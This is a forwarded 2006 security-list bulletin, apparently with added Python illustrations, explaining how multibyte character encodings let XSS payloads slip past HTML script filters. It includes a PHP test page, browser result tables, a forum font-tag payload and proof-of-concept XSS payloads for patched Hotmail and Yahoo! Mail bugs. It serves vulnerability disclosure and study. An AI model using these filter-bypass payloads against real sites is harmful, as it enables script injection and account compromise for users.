Thread-topic: [NEWS] Bypassing Script Filters with Variable-Width Encodings
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Sunday, August 13, 2006 8:22 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NEWS] Bypassing Script Filters with Variable-Width Encodings
>
> Bypassing Script Filters with Variable-Width Encodings
>
> A central problem in constructing XSS attacks is obfuscating
> the malicious code so that it gets past script filters. In the
> following paragraphs Cheng explains how variable-width
> encodings can be used to bypass such filters, and discloses
> how the technique applied to the Hotmail and Yahoo! Mail
> web-based mail services.
>
>
> A variable-width encoding (a.k.a. variable-length encoding) is
> a character encoding scheme in which codes of differing
> lengths are used to encode a character set. The most common
> variable-width encodings are multibyte encodings, which use
> varying numbers of bytes to encode different characters.
> Multibyte encodings were first used for Chinese, Japanese and
> Korean, whose character sets far exceed 256 characters. The
> Unicode standard has two variable-width encodings: UTF-8 and
> UTF-16. The most commonly used multibyte codes are two-byte
> codes: the EUC-CN form of GB2312, EUC-JP and EUC-KR are
> examples of such two-byte EUC codes. There are also some
> three-byte and four-byte codes.
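
To make the idea of differing code lengths concrete, here is a minimal Python sketch (not part of the original article) that counts how many bytes each character occupies in a few of the encodings discussed. The helper name encoded_lengths and the sample string are illustrative assumptions; the codec names are the ones shipped with Python's standard library.

```python
def encoded_lengths(text: str, codec: str) -> list[int]:
    """Return the number of bytes each character of text occupies in codec."""
    return [len(ch.encode(codec)) for ch in text]


if __name__ == "__main__":
    # An ASCII letter followed by the CJK ideograph U+4E2D.
    sample = "A\u4e2d"
    for codec in ("utf-8", "utf-16-le", "gb2312", "big5", "euc_jp", "shift_jis"):
        print(f"{codec:10} {encoded_lengths(sample, codec)}")
```

In the multibyte encodings the ASCII letter stays a single byte while the ideograph takes two or three, which is exactly the property the rest of the article relies on.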
>
> Example and Discussion:
> The following PHP file is the starting point for Cheng's idea.
>
> <html>
> <head>
> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
> </head>
> <body>
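> <?php
> // Emit every byte value 0..255 as the last byte of a quoted FACE
> // attribute, so that a lead byte can swallow the closing quote.
> for ($i = 0; $i < 256; $i++) {
>     echo "Char $i is <font face=\"xyz" . chr($i) . "\">not </font>"
>         . "<font face=\" onmouseover=alert($i) notexist=" . chr($i) . "\"     >"
>         // NOTE: 5 space characters follow the last \" so that even a
>         // 6-byte sequence cannot swallow the closing ">"
>         . "available</font>\r\n\r\n<br>\r\n\r\n";
> }
>
> ?>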
> </body>
> </html>
>
> For most values of $i, Internet Explorer 6.0 (SP2) will
> display "Char XXX is not available". When $i is between
> 192 (0xC0) and 255 (0xFF), it displays "Char XXX is available"
> instead. Take $i=0xC0 as an example and consider the
> following output:
>
> Char 192 is <font face="xyz[0xC0]">not </font><font face="
> onmouseover=alert(192) notexist=[0xC0]"     >available</font>
>
> 0xC0 is one of the 32 first bytes of 2-byte sequences
> (0xC0-0xDF) in UTF-8. So when IE parses the above code, it
> treats 0xC0 and the following quote as one sequence, and
> the two FONT elements therefore merge into one, with
> "xyz[0xC0]">not </font><font face=" as the value of the FACE
> attribute. The second 0xC0 starts another 2-byte sequence,
> which swallows the closing quote and becomes the value of the
> unquoted NOTEXIST attribute, so onmouseover=alert(192) is
> parsed as a live event handler. Because space characters
> follow that quote, each of 0xE0-0xEF, the first bytes of
> 3-byte sequences, is combined with the following quote and
> one space character into the value of the NOTEXIST attribute.
> Likewise, each first byte of a 4-byte sequence (0xF0-0xF7),
> 5-byte sequence (0xF8-0xFB) or 6-byte sequence (0xFC-0xFD) is
> combined with the following quote and space characters into
> one sequence.
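
The parsing behaviour described above can be modelled with a short Python sketch. It is only a model under stated assumptions: lenient_decode is a hypothetical decoder that trusts the lead byte and never checks the bytes that follow, which is how the text describes IE's behaviour, not a reproduction of IE's actual code. build_sample and first_face_value are likewise illustrative helpers, and the lead-byte ranges are the ones listed in the paragraph above.

```python
import re

# Lead-byte ranges and sequence lengths as listed in the text.
LEAD_BYTE_LENGTHS = [
    (0xC0, 0xDF, 2),
    (0xE0, 0xEF, 3),
    (0xF0, 0xF7, 4),
    (0xF8, 0xFB, 5),
    (0xFC, 0xFD, 6),
]
PLACEHOLDER = "\ufffd"


def sequence_length(byte: int) -> int:
    """Length of the sequence a byte claims to start (1 if not a lead byte)."""
    for low, high, length in LEAD_BYTE_LENGTHS:
        if low <= byte <= high:
            return length
    return 1


def lenient_decode(data: bytes) -> str:
    """Hypothetical model: trust the lead byte, never check the trail bytes."""
    out = []
    pos = 0
    while pos < len(data):
        length = sequence_length(data[pos])
        # A multibyte sequence collapses into one placeholder character.
        out.append(chr(data[pos]) if length == 1 else PLACEHOLDER)
        pos += length
    return "".join(out)


def build_sample(i: int) -> bytes:
    """Rebuild one line of the test page for byte value i."""
    lead = bytes([i])
    return b"".join([
        b'<font face="xyz', lead, b'">not </font>',
        b'<font face=" onmouseover=alert(', str(i).encode("ascii"),
        b") notexist=", lead, b'"     >available</font>',
    ])


def first_face_value(html: str) -> str:
    """Value of the first quoted FACE attribute, as a simple parser sees it."""
    match = re.search(r'face="([^"]*)"', html)
    return match.group(1) if match else ""


if __name__ == "__main__":
    for i in (0x41, 0xC0, 0xFC):
        print(hex(i), repr(first_face_value(lenient_decode(build_sample(i)))))
```

For an ordinary byte the first FACE value is just the intended font name, while for a lead byte it stretches across the end of the first element and into the second, leaving onmouseover outside any quotes. The five spaces matter in this model too: with 0xFC, the sequence consumes the quote and four spaces, and the remaining space keeps the closing ">" intact.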
>
> Here are the results of the above code as parsed by Internet
> Explorer 6.0 (SP2), Firefox 1.5.0.6 and Opera 9.0.1 in
> different variable-width encodings. The entries in the table
> are the byte ranges for which "available" is displayed.
>
>
> +-----------+-----------+-----------+-----------+
> |           | IE        | FF        | OP        |
> +-----------+-----------+-----------+-----------+
> | UTF-8     | 0xC0-0xFF | none      | none      |
> +-----------+-----------+-----------+-----------+
> | GB2312    | 0x81-0xFE | none      | 0x81-0xFE |
> +-----------+-----------+-----------+-----------+
> | GB18030   | none      | none      | 0x81-0xFE |
> +-----------+-----------+-----------+-----------+
> | BIG5      | 0x81-0xFE | none      | 0x81-0xFE |
> +-----------+-----------+-----------+-----------+
> | EUC-KR    | 0x81-0xFE | none      | 0x81-0xFE |
> +-----------+-----------+-----------+-----------+
> | EUC-JP    | 0x81-0x8D | 0x8F      | 0x8E      |
> |           | 0x8F-0x9F |           | 0x8F      |
> |           | 0xA1-0xFE |           | 0xA1-0xFE |
> +-----------+-----------+-----------+-----------+
> | SHIFT_JIS | 0x81-0x9F | 0x81-0x9F | 0x81-0x9F |
> |           | 0xE0-0xFC | 0xE0-0xFC | 0xE0-0xFC |
> +-----------+-----------+-----------+-----------+
>
>
> Application:
> Cheng doesn't think there is one typical way to exploit
> script-filter bypasses based on variable-width encodings,
> because the technique is very flexible. Just remember that
> if the webapp uses a variable-width encoding, you can bury
> the characters that follow your entry, and the buried
> characters might be crucial ones such as a closing quote.
>
> The above code might be exploited in general webapps that
> allow you to add formatting to your entry in the same way as
> HTML does. For example, in some forums, [font=Courier
> New]message[/font] in your message will be transformed into
> <font face="Courier New">message</font>. Supposing the forum
> uses UTF-8, we can attack by sending
>
> [font=xyz[0xC0]]buried[/font][font=abc onmouseover=alert()
> s=[0xC0]]exploited[/font]
>
> And it will be transformed into
>
> <font face="xyz[0xC0]">buried</font><font face="abc
> onmouseover=alert() s=[0xC0]">exploited</font>
>
> Again, the exploitation is very flexible; this FONT-FONT
> example is just an illustrative one. The following
> exploit against Yahoo! Mail is quite different from it.
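
The forum scenario can be sketched in Python as follows. This is an assumed, deliberately naive implementation of the [font=...] rewrite, not the code of any real forum; render_font_tags and is_strict_utf8 are hypothetical names. The second helper shows one possible countermeasure that is not discussed in the original article: rejecting input that is not well-formed UTF-8 before any markup is generated.

```python
import re

# Byte-level pattern for [font=NAME]TEXT[/font]; NAME may contain any byte
# except "]", including a stray UTF-8 lead byte.
FONT_TAG = re.compile(rb"\[font=([^\]]*)\](.*?)\[/font\]", re.DOTALL)


def render_font_tags(raw: bytes) -> bytes:
    """Naive byte-level rewrite of [font=...]...[/font] into FONT elements."""
    return FONT_TAG.sub(rb'<font face="\1">\2</font>', raw)


def is_strict_utf8(raw: bytes) -> bool:
    """True only if raw decodes as well-formed UTF-8."""
    try:
        raw.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return True


if __name__ == "__main__":
    # [0xC0] in the article's notation is the single raw byte 0xC0.
    attack = (b"[font=xyz\xc0]buried[/font]"
              b"[font=abc onmouseover=alert() s=\xc0]exploited[/font]")
    print(render_font_tags(attack))
    print("well-formed UTF-8:", is_strict_utf8(attack))
```

The rewrite itself looks harmless at the byte level, since every attribute value is quoted; the problem only appears once a lenient decoder merges each 0xC0 with the quote that follows it. A strict decoder refuses the input outright, because 0xC0 is never followed by a valid continuation byte here.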
>
> Disclosure:
> Using this method, Cheng found two XSS vulnerabilities in
> the Hotmail and Yahoo! Mail web-based mail services. Cheng
> informed Yahoo and Microsoft on April 30 and May 12
> respectively, and both have patched the vulnerabilities.
>
> Yahoo! Mail XSS:
> Before Cheng discovered this vulnerability, the Yahoo! Mail
> filtering engine could already block the "expression()" syntax
> in a CSS attribute even when a comment was used to break up
> the keyword ( expr/* */ession() ). Cheng used [0x81] together
> with the following asterisk to form one sequence, so that in
> the browser only the second */ would close the comment. The
> filtering engine, however, treated the first /* and the first
> */ as a pair, so it never saw the reassembled expression().
>
> MIME-Version: 1.0
> From: user<user@xxxxxxxx>
> Content-Type: text/html; charset=GB2312
> Subject: example
>
> <span style='width:expr/*[0x81]*/*/ession(alert())'>exploited</span>
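
The mismatch between the two views of the style value can be sketched in Python. Both views are assumptions made for illustration: filter_view treats every byte as one character, standing in for a charset-unaware filter, and browser_view is a hypothetical lenient double-byte decoder in which any byte in 0x81-0xFE (the IE range for GB2312 in the table above) swallows the byte after it. Neither is the real Yahoo! Mail or IE code.

```python
import re

CSS_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
PLACEHOLDER = "\ufffd"


def strip_comments(css: str) -> str:
    """Remove /* ... */ comments, pairing each /* with the nearest */."""
    return CSS_COMMENT.sub("", css)


def filter_view(data: bytes) -> str:
    """Byte-per-character view, as a charset-unaware filter would see it."""
    return data.decode("latin-1")


def browser_view(data: bytes) -> str:
    """Hypothetical lenient decoder: a byte in 0x81-0xFE swallows the next
    byte, whether or not that byte is a valid trail byte."""
    out = []
    pos = 0
    while pos < len(data):
        if 0x81 <= data[pos] <= 0xFE and pos + 1 < len(data):
            out.append(PLACEHOLDER)
            pos += 2
        else:
            out.append(chr(data[pos]))
            pos += 1
    return "".join(out)


if __name__ == "__main__":
    style = b"width:expr/*\x81*/*/ession(alert())"
    print("filter sees: ", strip_comments(filter_view(style)))
    print("browser sees:", strip_comments(browser_view(style)))
```

In the filter's view the comment ends at the first */, leaving a stray */ that keeps "expr" and "ession" apart. In the browser's view the first asterisk has been absorbed into the 0x81 sequence, so the comment runs to the second */ and the two halves join into expression().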
>
> Hotmail XSS:
> This exploit is almost the same as the example.php test page
> shown earlier.
>
> MIME-Version: 1.0
> From: user<user@xxxxxxxx>
> Content-Type: text/html; charset=SHIFT_JIS
> Subject: example
>
> <font face="[0x81]"></font><font face=" onmouseover=alert()
> s=[0x81]">exploited</font>
>
>
> Additional Information:
> The information has been provided by Cheng Peng Su
> <mailto:applesoup@xxxxxxxxx> .
> The original article can be found at:
> http://applesoup.googlepages.com/bypass_filter.txt
>
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without
> warranty of any kind.
> In no event shall we be liable for any damages whatsoever
> including direct, indirect, incidental, consequential, loss
> of business profits or special damages.